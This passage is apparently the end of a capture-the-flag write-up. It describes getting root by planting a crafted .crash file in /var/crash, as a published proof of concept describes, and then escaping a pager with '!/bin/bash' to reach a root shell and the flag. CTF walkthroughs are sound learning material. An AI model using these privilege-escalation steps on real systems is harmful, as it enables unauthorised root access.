D3y79LUD5W411qX4jyN++nfYIgCIIgCIIgCIIg/v/n/wE/YrClANAFAA==

I manually created a crash file at /var/crash with .crash extension with the above content and the exploit just worked fine as mentioned in the POC.

To get a root shell enter the below command in the pager view: !/bin/bash

We have successfully got a shell with root privileges.

Successfully got the root flag.

Thank You……